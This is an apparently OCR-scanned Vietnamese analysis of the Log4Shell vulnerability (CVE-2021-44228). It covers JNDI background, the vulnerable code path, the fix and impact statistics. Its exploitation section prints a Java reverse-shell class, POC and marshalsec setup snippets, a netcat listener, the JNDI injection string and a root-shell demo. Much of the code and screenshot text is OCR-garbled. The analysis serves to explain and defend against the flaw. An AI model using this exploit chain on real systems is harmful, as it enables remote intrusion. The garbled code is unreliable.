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Giới thiệu 
Gần đây, một lỗ hổng phần mềm rất nghiêm trọng đã được công bố. Nó có mã 
định danh CVE-2021-44228, nickname “log4shell”. Lỗ hổng đã làm cộng đồng 
nghiên cứu bảo mật nói chung và cộng đồng những nhà phát triển Java nói riêng 
dậy sóng. Nguyên nhân nằm ở sự phổ biến của thư viện chứa lỗ hổng - log4j2 - 
được sử dụng. Ước tính có 35000 thư viện, ứng dụng Java phụ thuộc vào nó bị 
ảnh hưởng (số liệu từ Google) dẫn tới 25 triệu máy chủ pubiic trên toàn thế giới 
gặp nguy hiểm. Nhưng sau khi phân tích, chúng tôi nhận thấy tác động của nó có 
thể còn sâu rộng hơn. 
Để giúp người dùng, những nhà nghiên cứu về bảo mật, những người quản trị, 
bảo trì hệ thống có cái nhìn cụ thể hơn về lỗ hổng này, chúng tôi sẽ phân tích về 
các khía cạnh: bản chất lỗ hổng, cách khai thác, cách khắc phục và đánh giá mức 
độ ảnh hưởng của lỗ hổng với các máy chủ trên thế giới và Việt Nam. 


Sau đây là bài phân tích kỹ thuật về lỗ hổng CVE-2021-44228. 


1. Tổng quan lỗ hổng 

1.1. Sơ đồ khai thác 

Để hiểu rõ về lỗ hổng, trước tiên chúng ta cần có cái nhìn tổng quan về quy trình 
lỗ hổng này bị khai thác: 


Nguồn ảnh: Alvaro Muñoz, Oleksandr Mirosh [4] 


Trong sơ đồ trên, chúng ta có: 
® máy chủ mục tiêu (màu xám) 
® kẻ tấn công 
® máy chủ của kẻ tấn công (màu đỏ) 
Quy trình tấn công: 
1. hacker dựng một máy chủ. Trên đó chạy ba dịch vụ: 
- LDAP 
- HTTP 
- server lắng nghe kết nối reverse shell 
2. hacker gửi một request độc hại đến máy chủ mục tiêu. 
3. máy chủ mục tiêu xử lý yêu cầu. 
4. máy chủ mục tiêu tạo kết nối đến máy chủ của kẻ tấn công, tải về một 


payload. 


5, máy chủ mục tiêu thực thi mã độc giấu trong payload. 


1.2. Giới thiệu về log4j2 

Log4j2 là một thư viện hỗ trợ ghỉ log, viết bằng ngôn ngữ Java, phân phối bởi 
Apache. Log4j2 được sử dụng rất rộng rãi. Ngoài log4j2 còn logback, 
java.util.logging... hỗ trợ việc ghi log. 


Độ phổ biến: 


Theo số liệu từ Sonatype, chỉ trong bốn tháng vừa qua, đã có 28.6 triệu lượt tải 
package log4j2 version 2.14.1, log4j là thư viện phổ biến thứ 25 trong danh sách 
được download và có khoảng 7000 thư viện sử dụng thư viện này. [1] 


Do đó, việc thư viện này dính lỗ hổng khiến cho rất nhiều thư viện và ứng dụng sử 
dụng nó bị ảnh hưởng. 


1.3. Những phiên bản bị ảnh hưởng 
Hầu như tất cả version log4j2 đều bị ảnh hưởng: 2.0-beta9 --> 2.14.1 


1.4. Những ứng dụng phổ biến bị ảnh hưởng 
Theo báo cáo từ hai chuyên gia Pearce Barry và HD Moore đến từ công ty Rumble, 
có rất nhiều ứng dụng phổ biến bị ảnh hưởng bởi lỗ hổng CVE-2021-44228 [7]: 


® Adobe Cold Fusion 
Minecraft Server 
McAfee Advanced Threat Defense 


Apache Casandra 


Apache Hadoop 


1.5. Giới thiệu về JNDI, LDAP, sự liên quan đến log4j2 
Để hiểu về CVE-2021-44228 cần hiểu về JNDI và LDAP. Thư viện log4j2 có một cơ 
chế cho phép lấy thông tin từ dịch vụ lưu trữ bên ngoài để hỗ trợ việc ghi log. Việc 
tương tác với các server này được thực hiện thông qua việc tận dụng API có tên 
ĐEEEEE SŠỎỖỎỎỖỎỖỎỖỎỖỖÖẼễẼỄẼỄẼễẼễẼỄẼỄễỄẼEẼ ễ=ễỄễỄẼễỄễỄễỄEEỄ E5 ễ ==ễễễEÃễẼö5› 
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JNDI (Java naming and directory interface). Lỗ hổng đang được phân tích lợi dụng 
tính năng này để tải về và thực thi mã khai thác. 


1.5.1. Các khái niệm quan trọng 

Naming service: là dịch vụ lưu trữ thực hiện ánh xạ “tên” (names) với các giá trị 
(values) tương ứng. [6] Chúng hoạt động giống như một từ điển. Nếu không có 
naming service, mỗi thiết bị sẽ phải lưu danh sách ánh xạ trong máy mình do đó 
gây lãng phí tài nguyên. Ví dụ điển hình: DNS, server chứa tên đăng nhập - mật 
khẩu,... 


Directory service: giống naming service nhưng có thể lưu thêm các thuộc tính của 
các đối tượng cần truy vấn. 


1.5.2. Các giao thức tương tác với directory service 

Có nhiều giao thức hỗ trợ giao tiếp với directory service: RMI, LDAP, CORBA 
nhưng LDAP dược lợi dụng để khai thác lỗ hổng CVE-2021-44228 do tương tác sử 
dụng giao thức RMI, CORBA đã bị kiểm soát chặt chẽ. 


Ví dụ về một đoạn code JNDI tương tác với server LDAP: 


// Create the initial context 
Hashtable env = new Hashtable(); 
env.put (Context.INITIAL CONTEXT FACTORY, 
"com. sun.Jjndi . 1dap..LdapCtxFPactory"); 
env.put (Context.PROVIDER_ URL, "1dap://1localhost:389"); 


DirContext ctx = new TnitialDirContext (env) ; 


// Bind a String to the name *Foo” in the Directory 
ctx.bind (*cn=foo,dc=test,dc=org“, *Sample String“); 


// Look up the object 
Object local obj = ctx.lookup (*cn=foo, dc=test, dc=org”) ; 


// Print it 
System.out.println (name + " is bound to: " + obj); 


1.5.3. Giới thiệu về JNDI reference 

Đặt vấn đề: 

Để lưu một đối tượng Java vào một naming service, chúng ta có thể serialize đối 
tượng đó, tuy nhiên việc đó gây tốn tài nguyên và làm chậm quá trình do một đối 
tượng Java có thể rất lớn trong khi một naming service phải xử lý yêu cầu truy vấn 
trong thời gian ngắn nhất có thể. 

Giải pháp: 

Chúng ta có thể load đối tượng Java đó một cách gián tiếp. Cụ thể, chúng ta query 
một bản ghi nhỏ có chứa thông tin về đối tượng đó (như địa chỉ host, tên class) để 
máy yêu cầu tiếp tục đi đến nơi cần thiết. Lúc này JNDI sẽ tải về file .class cần thiết 
và sử dụng factory để thực hiện tạo mới đối tượng thông qua phương thức 
constructor được định nghĩa trong file .class đó. 

Ví dụ một JNDI reference: 


$ cat ]Jndt reference 

DN: a 
JavaCLassName: foo 
JavaCodeBase: http: //LocaLhost :8909/ 
objectCLass: ]JavaNamtngReference 


JavaFactory: ExplLott 


Nội dung đối tượng “Exploit”: 


Exploit.java 
Sinport java.net.Socket; 
6 


7 pubLtc cLass ExpLott { 


8 

9 pubtLic ExpLott() |khrows Exceptton { 
19 Strtng host=”LocaLhost”; 

11 tnt port=9001; 

12 Strtng cmd=”/btn/sh”; 

13 Process p=new ProcessButLder (cmd) .redtrectErrorStream(trr¿e).start(); 
14 Socket s=new Socket(host,port); 
15 TnputStream pt=p.getTnputStream(), 
16 pe=p .qetErrorStream(), 

17 SL=s .getInputStream(); 

18 0utputStream po=p . get0utputStream() ,so=s .get0utputStream(); 
19 whttLe(!s_1sCLosed()) { 

29 whLLe(pt.avatLabtLe()>8) 

21 so.wrtte(pt.read()); 

22 whtLLe(pe .avatLabLe()>0} 

23 so.wrtte(pe.read()}; 

24 wh+LLe(st.avatLabLe()>0} 

25 po.wrtte(st.read()); 

26 so.fLush(); 

27 po.ftush(); 

28 Thread. sLeep( 59); 

29 try { 

30 p.exttVaLue(}; 

31 break; 

32 } 

33 catch (Exceptton e){ 

34 } 

35 }: 

36 p.destroy(); 

37 s.cLose(); 

38 

39} 


Chúng ta có thể lợi dụng tính năng này để lừa ứng dụng có chứa lỗ hổng tải về đối 
tượng của chúng ta sau đó thực thi code trong đó như ví dụ trên. 


2. Phân tích POC 
POC sử dụng: https://github.com/kozmer/log4j-shell-poc 


2.1. Tổng quan 
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vulnerable application 


read_input() 


logger.error( 
"${jndi:ldap://localhost:1389/a}" 
) 


JndiLookup.lookup("Idap://localhost:1389/a") 


get file at 
"localhost:1389/a" 


extract attributes 
from 
downloaded file 


"javaCodeBase" 
"lavaFactory" 
attributes 


download class 
object 


instantiate 
downloaded object 


execute code 


in constructor 


attacker side 


"${jndi:ldap://Iocalhost:1389/a}" +“. 


request 


$ cat 
DN: a 


jndi_reference 
JavaClassNane: foo 
javaCodeBase: http: //LocaLhost:8989/ 
objectClass: JavaNamtngReference 


1avaFactory: ExpLott 


Exploit.class - GHex 


Hie@ Edit View Wladoœw Help 


60 69 34 
60 2£ 98 67 69 39 
0A 09 94 0A 09 94 
80 36 9A 80 38 9A 
38 6A 98 : 3A 8A 90 
8A 88 3C 8A 88 3C 
80 3F 98 808 88 98 
600 43 8A 37 080 44 97 
60 69 98 80 48 97 
69 74 3E 03 28 29 


[+] Starttng Webserver on port 89696 http://9.0.6.0:8000 


Ltstentng on 6.0.0.0:1389 


60 66 6A 69 10 66 20 
87 99 31 0A 90 64 99 
80 34 67 09 35 6A 09 
80 37 80 39 6A 00 09 
89 99 3A 6A 98 89 99 
88 3E BA 686 3F 88 48 
88 98 88 688 32 8A 99 
86 45 8A 69 37 66 46 
66 49 81 69 96 3C 69 
56 61 80 64 43 6F 64 


KẾ CC 


Send LDAP reference resuLt for a redtrecttng to http: //LocaLhost:8006/ExpLott.cLass 
127.0.0.1 - - [25/Dec/2021 19:59:14] "GET /ExpLott.cLass HTTP/1.1" 296 - 
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2.2. Mô tả luồng thực thi 
® kẻ tấn công gửi một input cho ứng dụng chứa lỗ hổng, kích hoạt code ghi log. 
Ví dụ: "S{jndi:ldap://localhost:1389/a}" 


® Thư viện log4j2 phân tích cú pháp, nhận thấy có yêu cầu lookup jndi 
(“S{jndi:...}”), log4j2 gọi đến phương thức JndiLookup.lookup() và truyền vào 
tham số đường dẫn đến server LDAP. 


Projects x. Files Naviga... ' Variables . Debua... 1 ..,va ||Š\ LoggerContext./ava %' |3) ExtendedLogger.java *' |8\ JndiLookup.java % 
› #8 org.apache.logging.og4j.core.jackson ^|[ 2s gparam key the JNDI res e name to be 1ooked nu11 
› #8 org.apache.loqging.log4j.core.jmx Má greturn T tí 1 1 res 

— , : 4a| L . 
› #8 org apache.Logging.log4j.core layout_ v_ ENErrrie 
› #8 org.apache.logging.og4j.core.layout.internaL @| m public String 1ookup(final LogEvent event, final String key) { 
x #| org.apache.Logging.log4j.core.lookup (8l if (key == nu11) { 
lỞl AbstractConfigurationAwareLookup.cÌass = } D588 ABC 
lẺJ AbstractLookup.class 54 final String jndiNane = convertJndiNane (key) ; 
ContextMapLookup.class 55 try (final JndiManager jndiManager = JndiManager. getDefaultManager()) { 
l] p p 
Ia 56 return 0b]ec†ts.£oString(]ndiManager. 1ookup (jndiName), nu11); 
c DateLookup class 57 } catch (final NamingException e) { 
|ể] EnvironmentLookup.class 58 LOGGER.varn(LOOKUP, "Error 1ooking up JNDI resource [{}].", jndiName, e); 
Íể] EventLookup.class 59 return nutL; 
Íổ\ Interpolator.class S L } } 
lể] JavaLookup.class s2 
l8) _JmxRuntimelnputArgumentsLookup,cLass 63| m " 
B 64 Convert the given JNDI nane to the actuaL JWDT nane to use. 
= 65 Default inp1enentation appLi 3Va : C0IP/8DY. f 
l#] Log4jLookup.class 66 + unLe the i 


® Phương thức này gọi đến phương thức JndiManager.lookup() của thư viện 
JNDI. 


Projects ' Files lookup... ( Variables ( Debu... x¡ El va |8 LogManager.java * [8ì JndiManager.java X [Bì LoggerContext.java * [Š| Extendedlogs 
x GÌ 'main' suspended at '.JndiManager.lookup:172' b 
IGCf›ndiManager.lookup:172 

6i JndiLookup.Lookup:56 

1 Interpolator.lookup:221 

E1 StrSubstitutor.resolveVariable:1110 0srrde 

EI StrSubstitutor.substitute:1033 @jm protected boolean reLeaseSub(final long timeout, final TineUnit tineUnit) { 

EI StrSubstitutor.substitute:912 return JndiCLoser. closeSilently (this. contex†) ; 

E1 StrSubstitutor.replace:467 

I MessagePatternConverter.format:132 

6l PatternFormatter.format:38 

E1 PatternLayout$§PatternSerializer.toSerializabLe:? 

1 PatternLayout.toText;:244 

1 PatternLayout.encode:229 

E1 PatternLayout.encode:59 

1 AbstractOutputStreamAppender.directEncodel 

i AbstractOutputStreamAppender.tryAppend:19( 

E1 AbstractOutputStreamAppender.append:181 

éi AppenderControl.trvCallAppender;156 


T=TULL17 T 
propert1es.,putALT1(additionatProperties) ; 


return properties; 


+ Looks up a named object through this JNWDI context. 


3param name name of the ob]ect † 
param <T> the † f the ob]ect 
t @qreturn the na † 


+ @throws NamingException 1f a naming ] 


| } name = (5tring) "ldap://localhost;:1389/a” | ~- | qx 


@SuppressWarnings ("u:clieckcedl") 
m public <T> T Lookup(final String name) throws NamingException { 
return (T) this.context. Lookup (name) ; 


173 
174 


®_ Từ đây, JNDI sẽ truy vấn dến server LDAP, lấy về đối tượng được truy vấn, 
phân tích đối tượng. JNDI nhận thấy có attribute “javaCodeBase” và 
“iavaFactory” do đó sẽ thực hiện download đối tượng tại đường dẫn 
“iavaCodeBase/javaFactory” (trong trường hợp này: 


12 


“http://Iocalhost:8000/Exploit.class”). Cuối cùng, JNDI thực hiện khởi tạo đối 
tượng sử dụng phương thức constructor trong file “Exploit.class”. Mã nguồn: 


Exploit.java 
Simnport java.net.Socket; 
6 
7 pubLtc cLass ExpLott { 
8 


9 pubtic ExpLott() |khrows Exceptton { 


19 Strtng host=”LocaLhost”; 

11 tnt port=9001; 

12 StrtLng cmd=”/btn/sh”; 

13 Process p=new ProcessButLder (cmd) .redtrectErrorStream(rrue).start(); 
14 Socket s=new Socket(host,port); 

15 TnputStream pt=p.qgetInputStream(), 
16 pe=p..getErrorStream(), 

17 st=s.getInputStream(); 

18 0utputStream po=p . get0utputStream() ,so=s .get0utputStream(); 
19 whtLe(Is.tsCLosed()) { 

20 whtLe(pt.avatLabLe()>9) 

21 so.wrtte(pt.read()); 

22 whtLe(pe .avatLabLe( )>9) 

23 so.wrtte(pe.read()); 

24 whtLLe(st.avatLabLe()>0) 

25 po.wrtte(st.read()); 

26 so.fLush(); 

27 po.fLush(); 

28 Thread. sLeep( 50); 

29 try { 

30 p.exttVaLue(}; 

31 break; 

32 

33 catch (Exceptton e){ 

34 } 

35 1: 

36 p.destroy(); 

37 s.close(); 

38 

39} 


Hoạt động: mở reverse shell đến “localhost:9001”. 


2.3. Phân tích code chứa lỗ hổng 
Trong version log4j 2.14.1, không hề có đoạn code ngăn chặn việc sử dụng jndi để 
lấy dữ liệu từ bên ngoài cũng như việc kiểm tra địa chỉ server LDAP. Cụ thể, từ 
đoạn code thực hiện ghi log: 
EE==E=EE——ẼễẼễễ...j 
MỆ) 


(@0verrtde 
pubttc votd doPost(HttpServLetRequest req, HttpServLetResponse resp) throws ServLetExceptton, I0Exceptton { 


String userName 
Strtng password 


= req.getParameter(”uname ”); 

= req.getParameter(”passuord”}; 
resp. setContentType( “text /html”}; 

Prtnthrtter out = resp.getlirtter(); 

out. pr tntLn( ”<htmL><body>"”}; 


1f(userNane .equaLs(”adsin ”) && password.equaLs( ”password”)){ 
out.prtntLn(“lelcome Back Admtn”); 


} 
eLse{ 
/[ vutnerabLe code 


Loqger Logger = LogManager .getLogger (com.exanpLe. Log4sheLL. Log41.c1ass) ; 
Logger .error (userNane) ; 


out.prtntLn(”<code> the password you entered was tnvaltd, <u> we wtLL Log your tnformatton </u> </code>”); 


Cho đến đoạn code thực hiện lấy dữ liệu về từ server LDAP, luồng thực thi không 
gặp một trở ngại gì: 


Projects  Files lookup... Variables 'Debu...x_ m 
_* ì 'main' suspended at '.JndiManager.lookup:172' bÑ 
JndiManager.lookup:172 

1 JndiLookup.Lookup:56 

6i Interpolator.lookup:221 

E1 StrSubstitutor.resolveVariable:1110 

61 StrSubstitutor.substitute;1033 

I1 StrSubstitutor.substitute:912 

1 StrSubstitutor.replace:467 

Ei MessagePatternConverter.format:;132 

E1 PatternFormatter.format:38 

1 PatternLayout$PatternSerializer.toSerializabLe:? 

6l PatternLayout.toText;244 

E1 PatternLayout.encode;229 

I1 PatternLayout.encode:59 

1 AbstractOutputStreamAppender.directEncodel 

1 AbstractOutputStreamAppender.tryAppend:19( 

1 AbstractOutputStreamAppender.append:181 

l AppenderControl.trvCallAppender:156 


lểì LogManager./ava * |8) JndtManager./ava X [3ì LoggerContext./ava %' [3| ExtendedLogc 
properties.putALL (additiona(Prope r†tles); 
return properties; 
@0verride 


n protected boolean reLeaseSub(final long timeout, final TineUnit timeUnit) { 
return JndiCLoser. cfloseSilently (this. context) ; 


Looks up a naned object through this JMDI context. 


8param name name of 
8param <ĩ> + 


ec† 1f it could be tocated 


Excep†tlon 1f a naming exce encountered 


@SuppressWarnings ("unchecled" ) | } name = (String) "Ldap://localhost:1389/a" | ~- | 9) xị 
m public <T> T Lookup(final String name) throws NamingException { 
1ookup (nane) ; 


return (T) this.context, 


Để khắc phục điều này, trong bản cập nhật (version 2.17.0), trong file 
“JndiLookup.java” đã được thêm vào đoạn code: 


Pá ) 


* Constructs a new tnstance or throw ILLegaLStateExceptton tf thts feature ts dtLsabLed. 
* 


pubttc JndtLookup() { 
tf (1JndtManager.tsJndtLookupEnabted()) { 
throw new ILLegaLStateExceptton(”JNDTI must be enabled by setttng Log4j2.enabLeJndtLookup=true”); 
} 


Hoạt động: kiểm tra tính năng “jndi lookup” có được cho phép hay không. Nếu 
không, lập tức throw (raise) một exception khiến hoạt động lookup bị ngừng lại. 
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3. Cách khai thác 


3.1. Dựng máy chủ LDAP 
Đầu tiên, cần chạy một máy chủ LDAP cung cấp jndi_reference trỏ đến payload 
thực thi. 


Chúng ta sử dụng tính năng LDAP server thuộc bộ công cụ marshalsec 


(https://github.com/mbechler/marshalsec, một bộ công cụ hỗ trợ khai thác các 


ứng dụng Java). Hướng dẫn sử dụng: 


$ Java -cp mar shaLsec-0.6. 3- SNAPSHOT-aLL. Jar mar shaLsec. JndL.LDAPRefServer 
LDAPRefServer <codebase_ur L#cLassname> [<por t>] 


Chúng ta cần truyền vào các tham số: 

- codebase_url: địa chỉ host chứa file object Java. 

- classname: tên object Java. 

- port: cổng mà server LDAP sẽ lắng nghe (thường là 389, 1389, 2389,...) 


Server LDAP sẽ cung cấp một jndi_reference trỏ đến payload cuối cùng tại đường 
dẫn “http://codebase_url:port/classname.class”. 


Có thể chạy công cụ trên từ command line hoặc tích hợp vào script Python như 
trong mẫu của POC: 


95 def ldap_ server(usertp: str, Lport: tnt) -> None: 


96 sendme = "${]jndt: Ldap: //%s:1389/a}” % (usertp}) 
97 prtnt(Fore.GREEN + f”[+] Send me: {sendme}\n”} 
98 

99 urL = "http://{}:{}/#ExpLott”.format(usertp, Lport) 
1090 subprocess. run([ 

161 Java path + "'/(bin/1ava", 

192 "II - 

193 'tar qet/mar shatLsec -Ø0. 6Ø. 3- SNAPSHOT-aLL. 1ar”, 
194 'mar shaLsec . 1ndt _LDAPRefServer”, 

165 urL, 

106 ]) 


Sử dụng hàm “ldap_ server” bên trên: 
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71 def provtde_payload(usertp: str, webport: tnt, Lport: tnt) -> None: 


r2 qgenerate_payLoad(usertp, Lport} 

73 

T74 prtnt(Fore.GREEN + '[+] Setttng up LDAP server\n"'}) 

T5 

76 # create the LDAP server on new thread 

Tĩ t1 = threadtng.Thread(target=ldap_server, args=(usertp, webport)) 
78 t1.start() 


Vậy chúng ta đã có một máy chủ LDAP cung cấp một jndi reference trỏ đến 
payload duy nhất tại đường dẫn “http://userip:port/Exploit.class”. 


3.2. Dựng máy chủ HTTP 
Chúng ta cần một máy chủ HTTP để cung cấp file đối tượng Java (file “.class”) thực 
thi shell code. 


Điều này thực hiện khá đơn giản, có thể sử dụng các ứng dụng server HTTP phổ 
biến hiện nay như Apache Tomcat, Nginx, Microsoft IIS,... Bài phân tích này sử 
dụng module HttpServer của Python 3: 


80 # start the web server 

81 prtnt(f"[+] Starttng webserver on port {webport} http://0.0.0_6:{webport}"} 
82 httpd = HTTPServer(( '0 9 , webport}, StmpLeHTTPRequestHandter } 

83 httpd.serve_forever (} 


3.3. Chạy ứng dụng nhận reverse shell 
Để tương tác với máy mục tiêu, chúng ta cần chạy một chương trình lắng nghe 
reverse shell mở kết nối đến. 


Có thể sử dụng công cụ phổ biến: netcat, và lắng nghe trên cổng 9001. 


$ nc -nLvp 9061 - 
Ltstentng on 9_.9_0_6 9001 


3.4. Kích hoạt khai thác 

Demo: sử dụng hai máy: 

®_ Máy chạy web server. Địa chỉ: 192.168.1.87:8080 
®_ Máy tấn công. Địa chỉ: 192.168.1.5 
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Để kích hoạt khai thác, cần tìm ra những input nào do người dùng cung cấp sẽ 
được log lại. Chúng thường là tên đăng nhập, email, số transaction, số cmnd 
(trong những ứng dụng quản lý),... Ví dụ với ứng dụng web, khi nhập tên đăng 


nhập: 


Ø  192.168.1.87:8080 


GoFinance 


The most popular peer to peer lending at SEA 


Kết quả tên đăng nhập sẽ được log lại: 


Sau đó, chạy server LDAP và HTTP: 


Hetlo Again! 


Welcome Back 
3 to _be_logged 


xi 
& 


Forgot Password ? 


: o be Logged| 
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$ python poc.py --usertLp 192.168.1.5 


[!] CVE: CVE-2021-44228 
[!] Gtthub repo: https: //gLthub. com/kozmer /Log4] - sheLL-poc 


Java verston "1.8.0 20” 

3Java(TM) SE Runttme Envtronment (butLd 1.8.0 _20-b26) 

Java HotSpot(TM) 64-BLt Server VM (butLd 25.20-b23, mtxed mode) 
h" 

[+] ExpLott java cLass created success 

[+] Setttng up LDAP server 


[+] Send me: ${jnd+: Ldap: //192.168.1.5:1389/a} 
[+] Starttng webserver on port 8906 http: //0.0.0.0:8000 
LtLstentng on 0.0.0.0:1389 


Cuối cùng, đưa input dạng sau vào ứng dụng: 


S{jndi:ldap://<attacker_address>:<ldap_port>/a} 


Hetlo Again! 


Welcome Back 


GoFinance @_$indi:ldap://192.168.1.5:1389/a} 


The most popular peer to peer lending at SEA 


— 


Forgot Password ? 
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Ngay khi ứng dụng web mục tiêu thực hiện việc ghi log, sẽ có kết nối đến ứng 
dụng netcat (từ reverse shel trên máy mục tiêu) đang đợi sẵn trên máy tấn công, 
cho phép chúng ta thực thi lệnh: 

$ nc -nLvp 9661 


Ltstentng on 9.9.0.0 9001 
Connectton recetved on 192_168_1_87 45034 


whoamt+ 

root 

pwd 

/usr /LocatL/tomcat 

ts -L 

totaL 120 

~TW-F--T-- root root 57011 Jun 9 2016 LTICENSE 
-FW-F--fF-- root root 1444 Jun 9 2016 NOTIICE 
“rW-r==F~- root root 6739 Jun 9 2016 RELEASE-NOTES 
~TW-f--TF-- root root 16195 Jun 9 2916 RUNNING._txt 


drwxr -Xr -X 
drwxr -Xr -X 
drwxr -Sr -x 
drwxr -Xr -X 
drwxr -Xr -X 
drwxr -Sr -X 
drwxr -Xr -X 
drwxr -Xr -X 
drwxr -Xr -X 


root root 4096 Aug 31 2016 btn 

root root 4096 Dec 27 14:19 conf 

root staff 4096 Aug 31 2016 tnctLude 

root root 4096 Aug 31 2016 Ltb 

root root 4096 Dec 27 14:19 Logs 

root staff 4096 Aug 31 2016 nattve- j]nt-Ltb 
root root 4096 Aug 31 2016 temp 

root root 4096 Dec 27 14:10 webapps 

root root 4096 Dec 27 14:19 work 


Bà Bà RÓ ÚJ Bà RB 2 Bà RÓ ¬ ¬ 


Vậy chúng ta đã thực hiện khai thác thành công đối với lỗ hổng CVE-2021-44228. 


4. Đánh giá ảnh hưởng 

4.1. Ảnh hưởng trực tiếp gây ra bởi lỗ hổng trên log4j2 

Trước tiên, chúng ta đánh giá những ảnh hưởng trực tiếp gây ra bởi thư viện 
log4j2 - dựa trên số liệu vê những framework dựa trên, ứng dụng cài đặt log4j2. 


4.1.1. Trên thế giới 

Theo số liệu của Open Source Insights (một dịch vụ theo dõi các dự án mã nguồn 
mở trên thế giới, được tài trợ bởi Google), có tới 35863 framework Java mã 
nguồn mở sử dụng package log4j2 chứa lỗ hổng CVE-2021-44228, chiếm hơn 8% 


tổng số dự án được cung cấp bởi Maven Central (một trung tâm tập trung phân 
RE== 5c. 
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phối các framework Java lớn nhất trên thế giới) [3]. Đó là tính riêng các 
framework, còn số lượng ứng dụng được cài đặt dựa trên những framework này 
là rất lớn. 


€© ® G ©_ 8 https://deps.dev/advisory/GHSA/GHSA-jfh8-c2jp-5v3q Xã 


open (source (insights Allsystems ~ % 
Remote code injection in Log4j 


Overview 


Summary 
Source GHSA 
lÐ G910 cố Đán 36.04k 8.45k 8.28% 
Aliases CVE-2021-44228 X : 
PACKAGES WITH A KNOWN FIX 
Affected package org.apache.logging.Iog4j:log4j- TOTAL PACKAGES AFFECTED ® ® TOTAL ECOSYSTEM AFFECTED ® 
api 


org.apache.Iogging.log4j:log4j- 
core 


org.apache.logging.log4j:log4j-api 


Description 


Affected Version: < 2.15.0 


# Summary 

Patched/Unaffected 
Log4j versions prior to 2.16.0 are subject to a remote 
code execution vulnerability via the ldap JNDI parser. 2.15.0 
As per [Apache's Log4j security guide] 2.16.0 
(https://logging.apache.org/Iog4j/2.x/security.html): 2.17.0 
Apache Log4j2 <=2.14.1 JNDI features used in Affected 
configuration, log messages, and parameters do not 2141 


Tính đến thời điểm viết bài, mới chỉ có 8,45 nghìn thư viện Java được cập nhật, vì 
vậy còn rất nhiều package chứa lỗ hổng. Số lượng những ứng dụng được cài đặt 
trên các thư viện phiên bản cũ này là rất lớn, do đó hiện đang có rất nhiều server 
trên thế giới đang phải đối mặt với nguy cơ bị tấn công thông qua con đường này. 
Cụ thể, theo thống kê từ công cụ tìm kiếm Shodan.io, có khoảng 25 triệu máy chủ 
đang chạy web server Apache Tomcat: 


9% SHODAN Explore  Downloads "ricing "apache" K 


TOTAL RESULTS đá View Report (E@ Browse lmages II View on Ma 
24,975,930 New Service: Keep track of what you have connected to the Internet. Check out Shodan Monitor 
P.4 ; 
w :z ^ 

United States 7,889,765 

Germany 2,292,557 

Japan 1,963,395 - 

China 1,332,874 

France 1,158,373 

More... 

80 11,137,805 

443 8,185,569 

8080 489,707 _—__- 

ono+ ^¬an n=na 


4.1.2. Tại Việt Nam 
Sử dụng công cụ tìm kiếm Shodan.io với từ khóa “apache”, chúng ta có kết quả: 


s° SHODAN Explore Downloads Pricing 2 country:"VN" "apache"” j8: 


OIAI RESULTS đồi View Report (Ø Browse lmages TU View on Map 


88,067 New Service: Keep track of what you have connected to the Internet. Check out Shodan Monitor 


Ho Chi Minh City 33,117 


Hanoi 25,703 
Thủ Dầu Một 1,675 
Da Nang 1,296 
Thanh Hóa 1,019 
More... 

80 28,839 
TBAT 21,466 
443 18,778 


Có thể ước lượng số lượng webserver public tại Việt Nam bị ảnh hưởng bởi lỗ 
hổng CVE-2021-42288 là 88067, chưa kể đến những thiết bị cá nhân chạy hệ điều 
hành Android. Đây là một con số rất lớn, nếu kể đến lượng dữ liệu khổng lồ được 
lưu trữ có thể bị đánh cắp. 


EEÏỗ=EEEEỄEEỶEEEEEEEEẼ£: 
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4.2. Tình trạng khai thác 
4.2.1. Thống kê toàn câu 


Theo thống kê của CrowdSec, trên toàn thế giới hiện đã có 74.806 cuộc tấn công 
đến từ 2.500 tổ chức, cá nhân nhằm vào lỗ hổng log4j trên các máy chủ. [9] 
Ếy Source of Log42 CVE attacks , © 


Top malicious IPs reported by the Community 


As Name Badl.. Threats L4 R 
: MaliciousiPs Country 
DIGITALOCEA.. J8ƒẾẾ 126zs ` — BE tê cc  Grếce 


Threat... 
Linode, LLC 165 978 ° 
3. PONYNET 286 „ $ : F r 251. Greece 
4. OVHSAS 1.148 F 3 Russia 
Gia Triad Secu 119 3 F b 2 : China 
6. Contabo GmbH “: h ' 05.9: France 
Global Layer B : United Ar 
Shenzhen Ten. ụ Z r2 z Argentina 
AMAZON-02 : JP , ý 2 78.176.2.. Russia 
Hetzner Onlin.. LỆ 2 United St 
IONOS SE 
2. AS-CHOOPA 29 
MICROSOFT-C 22 
4. DEDIPATH-LLC 19 
UGB Hosting 17 H4 


Sweden 
ingapore 
India 
Netherlan 
Singapore 


Luxembourg 
Total IPs reported by the Community 


2.511 


+ 1.1% từ ngày trước 


China 
Spain 
France 
Total threats reported by the Community United St 


74.806 
+ 3.5% từ ngày trước 


Dự kiến trong thời gian tới con số này sẽ còn tăng thêm nhiều nữa do tốc độ cập 
nhật lỗ hổng đang khá chậm chạp, hiện vẫn còn 63,5% số lượng tải về thư viện 
log4j đến từ version 2.14.1 (theo thống kê từ Sonatype. [1] 


4.2.2. Trường hợp thực tế 

Thực tế đã ghi nhận một trường hợp lỗ hổng bị khai thác dẫn đến rò rỉ lượng lớn 
thông tin khách hàng tại công ty ONUS, một trong những nền tảng crypto lớn nhất 
Việt Nam. 


Cụ thể: ngay từ ngày 11 đến 13 tháng 12 năm 2021, hai ngày sau khi lỗ hổng được 
công bố, tin tặc đã tấn công máy chủ Cyclos của công ty ONUS qua đó cài đặt 
backdoor trên hệ thống. Do đó, dù được cài đặt bản vá vào ngày 14/12/2021 
nhưng tin tặc đã cướp được quyền kiểm soát những thông tin quan trọng trên hệ 


thống. Mãi cho đến ngày 23 tháng 12, thông qua những hành vi bất thường được 
————==-____...__--..._.--__-__.__—-._—__—._———_—-__—._-——__...| 
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phát hiện, các chuyên gia bảo mật của CyStack đã tiến hành xử lý sự cố nhưng 
thiệt hại đã rất lớn: “ thông tin cá nhân của 2 triệu người dùng ONUS đã bị rò rỉ, 
bao gồm dữ liệu eKYC, thông tin cá nhân và mật khẩu đã mã hóa”[10]. ONUS nhận 
được yêu cầu tống tiền từ phía kẻ tấn công, nhưng đã từ chối thỏa hiệp, sau đó 
thông tin đã bị rao bán trên RaidForums (một diễn đàn dành cho tin tặc). 


4.3. Những nguy cơ tiềm tàng 

Bản chất của lỗ hổng CVE-2021-44228 là không kiểm soát được việc sử dụng thư 
viện JNDI. Hai nhà nghiên cứu Alvaro Muñoz và Oleksandr Mirosh thuộc công ty 
HPE Fortify đã cảnh báo điều này từ năm 2016 [4] nhưng chỉ gần đây những lỗi 
liên quan mới được phát hiện và công bố. 


Sau CVE-2021-44228, đã có thêm ba lỗ hổng của log4j2 được công bố có liên quan 
